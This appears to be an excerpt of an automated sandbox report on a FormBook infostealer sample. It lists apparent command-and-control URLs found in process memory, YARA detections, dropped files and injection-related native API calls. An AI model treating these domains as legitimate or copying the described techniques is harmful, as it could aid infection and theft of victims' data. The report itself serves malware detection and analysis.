Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.milkweedmagic.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.milkweedmagic.com/vns/www.buymysoft.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.milkweedmagic.comReferer:
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpG
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpL
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehph
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMhh
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpu
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/ocid=iehpz
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.ocarlosresolve.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.ocarlosresolve.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.ocarlosresolve.com/vns/www.athleticamackay.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.ocarlosresolve.comReferer:
Source: explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp String found in binary or memory: http://www.ordertds.com
Source: explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp String found in binary or memory: http://www.ordertds.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.ordertds.com/vns/www.domennyarendi44.net
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.ordertds.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: changelog.txt.0.dr String found in binary or memory: http://www.site.com/music/song.mp3.
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.sparkspressworld.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.sparkspressworld.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.sparkspressworld.com/vns/www.ocarlosresolve.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.sparkspressworld.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.thebosscollectionn.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.thebosscollectionn.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.thebosscollectionn.com/vns/www.wiitendo.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.thebosscollectionn.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wiitendo.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wiitendo.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wiitendo.com/vns/www.hollandhousedesigns.design
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wiitendo.comReferer:
Source: changelog.txt.0.dr String found in binary or memory: http://www.wikia.com/wiki/Wikia.
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wlwmwntor.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wlwmwntor.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wlwmwntor.com/vns/www.worklesshours.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.wlwmwntor.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.worklesshours.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.worklesshours.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.worklesshours.com/vns/www.everydayresidency.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.worklesshours.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com/vns/www.innergardenhealing.space
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/=CLMEM
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0ow1
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0owM
Source: wscript.exe, 00000018.00000002.467023538.000000000558F000.00000004.00000001.sdmp String found in binary or memory: https://www.ordertds.com/vns/?BlP=7

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_0040535C

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\wscript.exe Dropped file: C:\Users\user\AppData\Roaming\0NN3-705\0NNlogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe Dropped file: C:\Users\user\AppData\Roaming\0NN3-705\0NNlogrv.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
PE file has a writeable .text section
Source: player-toolkit.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00029D50 NtCreateFile, 2_2_00029D50
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00029E00 NtReadFile, 2_2_00029E00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00029E80 NtClose, 2_2_00029E80
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00029F30 NtAllocateVirtualMemory, 2_2_00029F30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00029E7C NtClose, 2_2_00029E7C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00029F2D NtAllocateVirtualMemory, 2_2_00029F2D
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_02999A00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999A20 NtResumeThread,LdrInitializeThunk, 2_2_02999A20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999A50 NtCreateFile,LdrInitializeThunk, 2_2_02999A50
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029998F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_029998F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999840 NtDelayExecution,LdrInitializeThunk, 2_2_02999840
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_02999860
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029999A0 NtCreateSection,LdrInitializeThunk, 2_2_029999A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_02999910
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029996E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_029996E0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_02999660
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999780 NtMapViewOfSection,LdrInitializeThunk, 2_2_02999780
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029997A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_029997A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999710 NtQueryInformationToken,LdrInitializeThunk, 2_2_02999710
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029995D0 NtClose,LdrInitializeThunk, 2_2_029995D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999540 NtReadFile,LdrInitializeThunk, 2_2_02999540
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999A80 NtOpenDirectoryObject, 2_2_02999A80
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999A10 NtQuerySection, 2_2_02999A10
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0299A3B0 NtGetContextThread, 2_2_0299A3B0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999B00 NtSetValueKey, 2_2_02999B00
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029998A0 NtWriteVirtualMemory, 2_2_029998A0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999820 NtEnumerateKey, 2_2_02999820
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0299B040 NtSuspendThread, 2_2_0299B040
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029999D0 NtCreateProcessEx, 2_2_029999D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999950 NtQueueApcThread, 2_2_02999950
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029996D0 NtCreateKey, 2_2_029996D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999610 NtEnumerateValueKey, 2_2_02999610
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999650 NtQueryValueKey, 2_2_02999650
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999670 NtQueryInformationProcess, 2_2_02999670
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999FE0 NtCreateMutant, 2_2_02999FE0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0299A710 NtOpenProcessToken, 2_2_0299A710
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999730 NtQueryVirtualMemory, 2_2_02999730
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999770 NtSetInformationFile, 2_2_02999770
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0299A770 NtOpenThread, 2_2_0299A770
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999760 NtOpenProcess, 2_2_02999760
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_029995F0 NtQueryInformationFile, 2_2_029995F0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0299AD30 NtSetContextThread, 2_2_0299AD30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999520 NtWaitForSingleObject, 2_2_02999520
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_02999560 NtWriteFile, 2_2_02999560
Source: C:\Windows\explorer.exe Code function: 19_2_065BFA32 NtCreateFile,NtReadFile,NtClose, 19_2_065BFA32
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B395D0 NtClose,LdrInitializeThunk, 24_2_04B395D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39560 NtWriteFile,LdrInitializeThunk, 24_2_04B39560
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39540 NtReadFile,LdrInitializeThunk, 24_2_04B39540
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B396E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_04B396E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B396D0 NtCreateKey,LdrInitializeThunk, 24_2_04B396D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39610 NtEnumerateValueKey,LdrInitializeThunk, 24_2_04B39610
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_04B39660
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39650 NtQueryValueKey,LdrInitializeThunk, 24_2_04B39650
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39780 NtMapViewOfSection,LdrInitializeThunk, 24_2_04B39780
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39FE0 NtCreateMutant,LdrInitializeThunk, 24_2_04B39FE0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39710 NtQueryInformationToken,LdrInitializeThunk, 24_2_04B39710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39770 NtSetInformationFile,LdrInitializeThunk, 24_2_04B39770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_04B39860
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39840 NtDelayExecution,LdrInitializeThunk, 24_2_04B39840
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B399A0 NtCreateSection,LdrInitializeThunk, 24_2_04B399A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_04B39910
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39A50 NtCreateFile,LdrInitializeThunk, 24_2_04B39A50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39B00 NtSetValueKey,LdrInitializeThunk, 24_2_04B39B00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B395F0 NtQueryInformationFile, 24_2_04B395F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B3AD30 NtSetContextThread, 24_2_04B3AD30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39520 NtWaitForSingleObject, 24_2_04B39520
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39670 NtQueryInformationProcess, 24_2_04B39670
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B397A0 NtUnmapViewOfSection, 24_2_04B397A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39730 NtQueryVirtualMemory, 24_2_04B39730
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B3A710 NtOpenProcessToken, 24_2_04B3A710
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B3A770 NtOpenThread, 24_2_04B3A770
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39760 NtOpenProcess, 24_2_04B39760
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B398A0 NtWriteVirtualMemory, 24_2_04B398A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B398F0 NtReadVirtualMemory, 24_2_04B398F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39820 NtEnumerateKey, 24_2_04B39820
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B3B040 NtSuspendThread, 24_2_04B3B040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B399D0 NtCreateProcessEx, 24_2_04B399D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39950 NtQueueApcThread, 24_2_04B39950
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39A80 NtOpenDirectoryObject, 24_2_04B39A80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39A20 NtResumeThread, 24_2_04B39A20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39A10 NtQuerySection, 24_2_04B39A10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B39A00 NtProtectVirtualMemory, 24_2_04B39A00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_04B3A3B0 NtGetContextThread, 24_2_04B3A3B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E9D50 NtCreateFile, 24_2_003E9D50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E9E00 NtReadFile, 24_2_003E9E00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E9E80 NtClose, 24_2_003E9E80
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E9F30 NtAllocateVirtualMemory, 24_2_003E9F30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E9E7C NtClose, 24_2_003E9E7C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 24_2_003E9F2D NtAllocateVirtualMemory, 24_2_003E9F2D
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
Detected potential crypto function
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_00406945 0_2_00406945
Source: C:\Users\user\Desktop\focus.exe Code function: 0_2_0040711C 0_2_0040711C
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00011030 2_2_00011030
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002D986 2_2_0002D986
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002E241 2_2_0002E241
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002DAA6 2_2_0002DAA6
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002D2D0 2_2_0002D2D0
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002DB23 2_2_0002DB23
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002DCEB 2_2_0002DCEB
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00012D87 2_2_00012D87
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00012D90 2_2_00012D90
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00019E2B 2_2_00019E2B
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_00019E30 2_2_00019E30
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002DF20 2_2_0002DF20
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe Code function: 2_2_0002CF93 2_2_0002CF93
